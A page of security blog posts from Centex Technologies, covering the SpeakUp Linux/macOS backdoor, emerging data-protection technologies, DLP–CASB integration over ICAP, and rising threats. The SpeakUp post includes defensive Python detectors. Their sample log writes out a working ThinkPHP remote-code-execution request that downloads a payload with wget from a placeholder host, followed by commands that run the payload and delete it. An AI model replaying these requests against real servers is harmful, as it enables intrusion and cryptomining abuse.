

SpeakUp: A New Malware Threat

SpeakUp is a backdoor Trojan that primarily affects Linux distributions and macOS systems. Its reach is not limited to those hosts, however: any server running ThinkPHP, Hadoop YARN, Oracle WebLogic or Apache ActiveMQ is a potential target, because SpeakUp carries exploits for known remote code execution vulnerabilities in these products. It is named after its command-and-control domain, ‘SpeakUpOmaha[dot]com’. SpeakUp uses these exploits to propagate laterally within the infected subnet and outward across new IP ranges, and it drops cryptocurrency miners on infected systems for unauthorized cryptomining.

Mode Of Infection: SpeakUp's initial infection vector is CVE-2018-20062, a remote command execution vulnerability in ThinkPHP. The infection proceeds in three HTTP requests:

  • The attacker sends a GET request carrying the malicious injection to the target server. The injected PHP code acts as a web shell that executes whatever commands arrive in the ‘module’ parameter of a query string.
  • A second HTTP request, issued through that shell, pulls the Perl backdoor payload (named ‘ibus’, after the Intelligent Input Bus) and stores it in a separate location on the server.
  • A third HTTP request launches the backdoor: it executes the Perl script and then deletes the dropped files to remove evidence.
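
To make the three-request sequence concrete, here is an added detection example written for this page (not code from the SpeakUp research or from any product). It scans web server access logs for the two things described above: a request for ThinkPHP's `\think\app/invokefunction` route, which is the public exploitation pattern for CVE-2018-20062, and a `module` query parameter carrying a shell command, which is how the dropped PHP shell is driven. The log lines are constructed for the example, the IP addresses are documentation ranges, and the download host and the `/tmp/ibus` path are placeholders, not indicators taken from the real campaign.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in Apache/nginx "combined" format; not real traffic.
# 203.0.113.5 mimics the three-step SpeakUp sequence, 198.51.100.7 is benign.
SAMPLE_LOG = r"""
203.0.113.5 - - [10/Feb/2019:10:01:12 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://dl.example.invalid/ibus%20-O%20/tmp/ibus HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6)"
203.0.113.5 - - [10/Feb/2019:10:01:13 +0000] "GET /index.php?module=perl%20/tmp/ibus HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6)"
203.0.113.5 - - [10/Feb/2019:10:01:14 +0000] "GET /index.php?module=rm%20-f%20/tmp/ibus HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6)"
198.51.100.7 - - [10/Feb/2019:10:02:00 +0000] "GET /index.php?s=/index/user/login&module=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2019:10:02:05 +0000] "GET /static/app.js HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# CVE-2018-20062: ThinkPHP 5.x routes "s=/.../\think\app/invokefunction" to an
# arbitrary PHP function call. The backslashes may arrive raw or encoded as %5C,
# so matching is done on the URL-decoded request.
THINKPHP_RCE_RE = re.compile(r'\\think\\app/invokefunction', re.IGNORECASE)

# Tokens that indicate a shell command rather than an ordinary module name.
SHELL_TOKEN_RE = re.compile(
    r'(?:^|[\s;&|])(?:perl|python|sh|bash|wget|curl|chmod|rm)\b|/tmp/|[;|`$]'
)


def parse_line(line: str):
    """Return the interesting fields of one combined-format log line, URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["url"] = unquote(entry["url"])
    return entry


def classify(url: str):
    """Return the list of rule names that fire for one decoded request URL."""
    findings = []
    if THINKPHP_RCE_RE.search(url):
        findings.append("thinkphp_invokefunction_rce")
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if any(SHELL_TOKEN_RE.search(v) for v in query.get("module", [])):
        findings.append("module_param_shell_command")
    return findings


def scan_log(text: str):
    """Scan a log excerpt and return (ip, rule, decoded_url) tuples for every hit."""
    hits = []
    for line in text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry["url"]):
            hits.append((entry["ip"], rule, entry["url"]))
    return hits


if __name__ == "__main__":
    for ip, rule, url in scan_log(SAMPLE_LOG):
        print(f"{ip}  {rule}  {url}")
```

Run against the constructed sample, the first rule fires once (the exploit request) and the second twice (the shell launching the backdoor and then cleaning up), all from the same client, while the benign `module=1` request does not trigger. On a real server the same client hitting both rules within seconds is the sequence the three bullets describe, and is worth an immediate look at `/tmp` and at outbound connections from the web server.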

Registering A New Victim: Once a server is compromised, SpeakUp communicates with its command-and-control (C&C) domain over HTTP using POST and GET requests. It sends the victim ID, the version of the installed script and other host details to the C&C domain in a POST request. If the C&C server replies “needrgr”, the host is a new victim that must be registered; the Trojan then runs a series of Linux commands to collect complete information about the victim system and forwards it to the C&C.

Functions And Tasks: After registration, the Trojan polls its C&C domain at a fixed interval, the ‘Knock Interval’, of 3 seconds. The C&C server commonly answers with one of the following commands:

  • “newtask”: instructs the Trojan to execute arbitrary code, download and execute a file, uninstall itself, or send updated host information.
  • “notask”: instructs the Trojan to sleep for the 3-second Knock Interval and then poll for a new task.
  • “newerconfig”: instructs the Trojan to update the miner configuration file.

The Trojan defines three User-Agent strings for its requests. A User-Agent is the HTTP request header with which a client identifies itself to a server (web servers typically use it to tell a mobile browser from a desktop one); it is not a library. The User-Agents defined by SpeakUp include two macOS X User-Agents and a hashed string, which is one indicator defenders can look for in outbound traffic from Linux servers.

Propagation: For further spread, SpeakUp is loaded with an additional Python script that lets the Trojan identify, scan and infect other Linux servers in both internal and external subnets.
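
The 3-second Knock Interval is a detection opportunity: a host that contacts the same domain every few seconds with almost no variation looks nothing like a person browsing. The following is an added example written for this page (not code from the SpeakUp research or from any product) that groups proxy log entries by client and destination host and flags pairs whose inter-request gaps are nearly constant. The log lines are constructed, `c2.example.invalid` stands in for the real C&C domain, and the thresholds are starting points to tune rather than published values.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, one request per line:
# "<ISO timestamp> <client> <method> <host> <path>". Not real traffic.
# 10.0.0.12 knocks on a stand-in C&C host every 3 s; 10.0.0.33 browses normally.
SAMPLE_PROXY_LOG = """
2019-02-10T10:05:00 10.0.0.12 POST c2.example.invalid /
2019-02-10T10:05:03 10.0.0.12 POST c2.example.invalid /
2019-02-10T10:05:06 10.0.0.12 POST c2.example.invalid /
2019-02-10T10:05:09 10.0.0.12 GET c2.example.invalid /
2019-02-10T10:05:12 10.0.0.12 POST c2.example.invalid /
2019-02-10T10:05:15 10.0.0.12 POST c2.example.invalid /
2019-02-10T10:05:01 10.0.0.33 GET www.example.org /index.html
2019-02-10T10:05:47 10.0.0.33 GET www.example.org /about.html
2019-02-10T10:05:48 10.0.0.33 GET www.example.org /style.css
2019-02-10T10:08:10 10.0.0.33 GET www.example.org /contact.html
2019-02-10T10:08:11 10.0.0.33 GET www.example.org /style.css
"""


def load_requests(text: str):
    """Group request timestamps by (client, destination host)."""
    by_pair = defaultdict(list)
    for line in text.strip().splitlines():
        ts, client, _method, host, _path = line.split()
        by_pair[(client, host)].append(datetime.fromisoformat(ts))
    return by_pair


def find_beacons(text: str, min_requests: int = 5, max_jitter: float = 0.25):
    """Flag (client, host) pairs whose inter-request gaps are nearly constant.

    jitter is the coefficient of variation (stdev / mean) of the gaps: a scripted
    knock every 3 s gives roughly 0, human browsing gives a large value.
    """
    results = []
    for (client, host), times in load_requests(text).items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            results.append({
                "client": client,
                "host": host,
                "requests": len(times),
                "interval_s": round(mean, 2),
                "jitter": round(jitter, 3),
            })
    return results


if __name__ == "__main__":
    for r in find_beacons(SAMPLE_PROXY_LOG):
        print(f"{r['client']} -> {r['host']}: {r['requests']} requests "
              f"every {r['interval_s']} s (jitter {r['jitter']})")
```

On the sample, only the 10.0.0.12 to c2.example.invalid pair is reported, with a 3.0 s interval and zero jitter. Other malware families add random sleep to blur the interval, so treat `max_jitter` as a dial rather than a constant, and pair the timing check with the page's other indicator: a Linux server that presents a macOS User-Agent on those periodic requests is an anomaly in its own right.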

For more information on malware threats and to know how to secure your IT system, call Centex Technologies at (254) 213-4740.

Emerging Data Security Technologies

There has been a sharp increase in cyber-attacks across the globe. This has created a need for more advanced data protection and cyber security solutions that can defend an organization's IT systems and protect business and consumer data. In this environment, newer technologies play an important role in providing state-of-the-art data security.

Some of the prominent technologies opening up better data security in the future are:

  1. Hardware Authentication: Weak passwords and usernames make it easy for attackers to get into information systems, which compromises sensitive data and pushes experts toward stricter authentication. One approach is hardware-based user authentication, in which a physical token or a credential bound to the device is required in addition to the password. Hardware authentication is particularly important for the Internet of Things, where any device seeking connectivity must be able to prove that it is authorized to connect.
  2. User Behavior Analytics (UBA): A cybersecurity process that detects threats, targeted attacks and financial fraud by baselining normal user activity and flagging deviations from it. It draws on network and authentication events, such as malicious behavior by attackers or failed and anomalous use of usernames and passwords. UBA also surfaces risky user habits that security awareness training can address.
  3. Data Loss Prevention: Encrypting data at the field and sub-field level protects it wherever it is stored. Where format-preserving encryption or tokenization is used, many business processes can run on data in its protected form, so attackers cannot monetize what they take even after a successful breach. For data loss prevention to work well, enterprises should also ensure compliance with data privacy and security regulations.
  4. Cloud Technology: The cloud will significantly change how system security technology is delivered. Users have embraced cloud technology to store the vast amount of information generated every day, and the migration from on-premises data storage, together with the development of security controls designed for the cloud, is proceeding gradually.
  5. Deep Learning: Deep learning is a branch of machine learning, which is itself a branch of artificial intelligence. Security experts are interested in these techniques because they focus on anomalous behavior: when fed the right data about a potential security threat, a model can decide how to prevent an attack based on its immediate environment without human input. Deep learning has made it possible to analyze the different entities found in an enterprise at both the micro and the macro level.

Combining these new technologies with fundamental security controls helps ensure that an organization's confidential information stays safe. For more information on emerging data security technologies, call Centex Technologies at (254) 213-4740.

Reasons To Integrate DLP With Cloud Access Security Broker

Cloud-based services give businesses greater flexibility and access to core business applications. The drawback is that information stored in and shared through these services sits outside the organization's own network and is exposed to misconfiguration, over-broad sharing and unauthorized access. To address this, organizations are adopting cloud access security broker (CASB) solutions to protect data stored in both sanctioned and unsanctioned cloud applications. A CASB can be deployed on-premises or consumed as a cloud service; either way it sits as a security layer between the cloud application and its users to monitor activity and enforce security policy. Another set of tools widely used to prevent data loss is DLP. Data Loss Prevention (DLP) tools classify regular and critical data and identify policy violations.

Security vendors are integrating CASB and DLP solutions to monitor and control sensitive data. The combination acts as a control point between users, the cloud services they can reach and the data stored in the cloud, and offers advantages such as real-time data protection and access management.

Other reasons to integrate DLP with CASB:

  • A rising number of businesses are falling victim to cyber-attacks and data breaches, and criminals are targeting enterprises with malware designed specifically for cloud platforms. They take advantage of gaps such as poor configurations, unauthorized devices and ill-defined access management, which are blind spots that an on-premises DLP deployment cannot see. Integrating DLP with a CASB extends DLP coverage to sensitive data stored in the cloud.
  • As attacks change, the industry's response has to keep evolving. The standard network-to-endpoint workflow should no longer be assumed sufficient against new and sophisticated malware. DLP and CASB have overlapping features, but on their own DLP lacks cloud coverage and CASB lacks deep content inspection, so neither solution alone gives complete coverage. Integrating both provides enhanced coverage to cloud service users.
  • Integrating DLP and CASB is straightforward. The CASB uses ICAP (Internet Content Adaptation Protocol) to send content to the DLP for review, and the DLP inspects the files against its existing policies. When a violation is found, the DLP reports it to the CASB cloud platform via the connector software, and the CASB enforces the remediation action on the cloud service through that service's API.
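
The ICAP hand-off in the last point can be sketched end to end. The following is an added example written for this page, not code from any CASB or DLP vendor: the CASB side wraps an intercepted HTTP upload in an ICAP REQMOD request (RFC 3507), a stand-in DLP engine parses the Encapsulated header, de-chunks the body, runs two hypothetical regex policies, and answers either `204 No Content` (no violation, pass the upload through) or `200 OK` carrying an HTTP 403 response for the CASB to return to the user. The `X-Violations-Found` header, the policy names, the host names and the sample uploads are all assumptions made for the example; real products signal verdicts with their own headers and, as the text says, enforce the block through the cloud service's API rather than only with the inline 403 shown here.

```python
import re

# Hypothetical DLP policies for the example: an SSN-like pattern and a 16-digit
# card-like number (no Luhn check, to keep the example short).
POLICIES = {
    "ssn": re.compile(rb"\b\d{3}-\d{2}-\d{4}\b"),
    "pan": re.compile(rb"\b(?:\d[ -]?){15}\d\b"),
}

# Constructed HTTP uploads the CASB has intercepted on their way to a cloud app.
REQ_HEAD = b"POST /upload HTTP/1.1\r\nHost: files.example.invalid\r\nContent-Type: text/plain\r\n\r\n"
CLEAN_UPLOAD = REQ_HEAD + b"Quarterly roadmap draft, nothing sensitive here."
SSN_UPLOAD = REQ_HEAD + b"Employee record: John Doe, SSN 123-45-6789"
CARD_UPLOAD = REQ_HEAD + b"Customer paid with card 4111 1111 1111 1111"


def chunked(body: bytes) -> bytes:
    """Encode a body as a single HTTP chunk followed by the terminating zero chunk."""
    if not body:
        return b"0\r\n\r\n"
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body)


def dechunk(data: bytes) -> bytes:
    """Decode chunked transfer encoding (chunk extensions ignored, trailers dropped)."""
    out, pos = b"", 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)
        if size == 0:
            return out
        start = end + 2
        out += data[start:start + size]
        pos = start + size + 2


def build_reqmod(icap_host: str, http_request: bytes) -> bytes:
    """CASB side: wrap an intercepted HTTP request in an ICAP REQMOD request."""
    hdr_end = http_request.index(b"\r\n\r\n") + 4
    req_hdr, req_body = http_request[:hdr_end], http_request[hdr_end:]
    icap_head = (
        f"REQMOD icap://{icap_host}/reqmod ICAP/1.0\r\n"
        f"Host: {icap_host}\r\n"
        "Allow: 204\r\n"  # we accept "204 No Content" for clean traffic
        f"Encapsulated: req-hdr=0, req-body={len(req_hdr)}\r\n\r\n"
    ).encode()
    return icap_head + req_hdr + chunked(req_body)


def dlp_inspect(icap_request: bytes) -> bytes:
    """DLP side: locate the encapsulated body, apply the policies, answer in ICAP."""
    head, _, encapsulated = icap_request.partition(b"\r\n\r\n")
    headers = dict(line.split(b": ", 1) for line in head.split(b"\r\n")[1:])
    offsets = {k: int(v) for k, v in re.findall(rb"(\w+-\w+)=(\d+)", headers[b"Encapsulated"])}
    body = dechunk(encapsulated[offsets[b"req-body"]:])
    violations = [name for name, rx in POLICIES.items() if rx.search(body)]
    if not violations:
        return b"ICAP/1.0 204 No Content\r\n\r\n"
    # Violation: hand the CASB an HTTP 403 to return instead of forwarding the upload.
    found = ",".join(violations).encode()
    http_resp = b"HTTP/1.1 403 Forbidden\r\nContent-Type: text/plain\r\n\r\n"
    resp_body = b"Upload blocked by DLP policy: " + found
    return (
        b"ICAP/1.0 200 OK\r\n"
        b"X-Violations-Found: " + found + b"\r\n"
        b"Encapsulated: res-hdr=0, res-body=" + str(len(http_resp)).encode() + b"\r\n\r\n"
        + http_resp + chunked(resp_body)
    )


def casb_decide(icap_response: bytes):
    """CASB side: turn the DLP's ICAP reply into an enforcement decision."""
    head = icap_response.split(b"\r\n\r\n", 1)[0]
    code = int(head.split(b"\r\n", 1)[0].split()[1])
    if code == 204:
        return ("allow", [])
    m = re.search(rb"^X-Violations-Found: ([^\r\n]+)", head, re.MULTILINE)
    return ("block", m.group(1).decode().split(",") if m else [])


if __name__ == "__main__":
    for name, upload in [("clean", CLEAN_UPLOAD), ("ssn", SSN_UPLOAD), ("card", CARD_UPLOAD)]:
        verdict = casb_decide(dlp_inspect(build_reqmod("dlp.example.invalid", upload)))
        print(f"{name}: {verdict}")
```

The Encapsulated header is the part worth understanding: it tells the DLP where the HTTP headers end and the chunked body begins inside the ICAP message, so the engine never has to guess at boundaries. Sending `Allow: 204` is what lets the DLP answer a clean upload without echoing the whole request back, which is why a busy CASB to DLP link stays cheap.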

Most organizations are integrating DLP with CASB as a security standard to protect their data from these threats.

For more information about IT and security risks, call Centex Technologies at (254) 213-4740.

Reasons To Use VPN

PDF Version: Reasons-To-Use-VPN

Rising Security Threats

Cybersecurity threats are not new, but they have gained momentum as the intensity and volume of attacks have increased in recent years. A mix of sophisticated older threats and new zero-day attacks has created the need for new cyber security techniques.

To formulate effective cyber security strategies, it is important to understand the different types of rising security threats:

  1. Insecure API: An API (Application Programming Interface) is the interface through which a cloud service is driven programmatically. When an organization sources a cloud service from a provider, that interface is not used by a single client; it is shared by numerous other customers, so the organization cannot control the security of the interface itself. As a client, an organization should make sure that the provider applies stringent security measures, from authentication through to encryption.
  2. Direct Data Center & Cloud Attacks: Attackers launch these attacks by locating vulnerabilities in applications and exploiting them to enter a cloud network. The most commonly exploited weaknesses are weak passwords and inadequate authentication. Once inside, attackers can move freely across applications and data centers, and such intrusions are not easily spotted by the compromised organization.
  3. Crypto-jacking: As cryptocurrency gains popularity, cryptocurrency-related attacks are rising too. Crypto-jacking is the unauthorized use of someone else's computer to mine cryptocurrency. The mining code is either delivered through a link sent to the victim in a phishing e-mail or embedded in a malicious online ad or website. When the user clicks the link, the miner is installed on their computer. In the case of an infected ad or website, nothing is installed: the mining script executes automatically in the victim's browser as soon as the page or ad loads. Unlike ransomware, mining code does not harm the user's personal data, but it consumes CPU resources, which slows the machine down.
  4. Advanced Persistent Threat (APT): In an APT, the attacker breaches a network and stays undetected for a long time, maximizing dwell time rather than demanding an immediate ransom. The main motive is to steal information or security data unobtrusively. The initial breach may use malware, exploit kits or piggybacking on legitimate traffic; once inside, attackers steal login credentials to move easily across the network.
  5. IoT Attacks: Connected devices now include laptops, tablets, routers, webcams, smart watches, wearables, automobiles, home electronics and more. As IoT becomes ubiquitous and the number of connected devices grows, cyber criminals target IoT networks for intrusion and infection. Once they gain access to a network, they can reprogram devices to cause disruption, lock essential devices for ransom, overload the network, and so on.

With security threats rising, organizations need to follow strict data management and security practices to protect their data.

For more information about IT and security risks, call Centex Technologies at (254) 213-4740.

© Copyright 2022 The Centex IT Guy. Developed by Centex Technologies